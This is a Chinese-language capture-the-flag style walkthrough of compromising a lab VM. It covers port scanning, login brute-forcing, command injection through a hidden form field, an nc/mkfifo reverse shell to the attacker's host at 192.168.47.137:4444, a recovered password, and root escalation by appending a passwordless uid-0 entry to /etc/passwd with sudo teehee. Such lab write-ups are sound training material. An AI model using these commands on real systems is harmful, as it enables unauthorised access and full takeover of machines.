首先惯例进行信息收集
nmap -sV -T4 -p0-65535 192.168.47.0/24
192.168.47.139为目标机器,访问一下80端口
除了一个登陆框什么也没有给出,也没有嗅探到相关的cms,先抓个包看一下密码是否为明文传输,有没有暴力破解或者弱口令的可能
跑了很多字典之后也没有发现长度不同的响应,挨个查看一下
不知道是什么原因什么密码都可以登陆进去,是因为没有不对的还是怎么回事,反正是很多密码都能登录。接着往下走,命令?命令执行,点开看看
点击run之后发现执行了ls -l命令,首先想到的是input标签传进了一个命令,进入F12查看前端html代码
发现到命令参数,尝试修改再run
看样子是可行的,直接尝试反弹一个shell到kali
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.47.137 4444 >/tmp/f
nc -lvvp 4444
成功
进入home目录下发现到jim 和 sam的文件夹,进入Jim之后翻到了old-password.bak文件,看名称即可知道意思是旧密码的保存文件,应该是ssh爆破,尝试一下
在var/mail里寻找到了一封邮件,老板让查理斯把密码给咱,ok,收到了老板
^xHhA&hvim0y
登陆进去后sudo -l一下查看不需要密码就可以执行的命令
teehee提权
teehee是个小众的linux编辑器。如果有sudo权限。可以利用其来提权
核心思路就是利用其在passwd文件中追加一条uid为0的用户条目
echo "kkk::0:0:::/bin/bash" | sudo teehee -a /etc/passwd#如:kkk:x:0:0::/home/kkk:/bin/bash
#[用户名]:[密码]:[UID]:[GID]:[身份描述]:[主目录]:[登录shell]
"-a" 选项的作用等同于 ">>" 命令
直接 su kkk,直接无密码进入
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
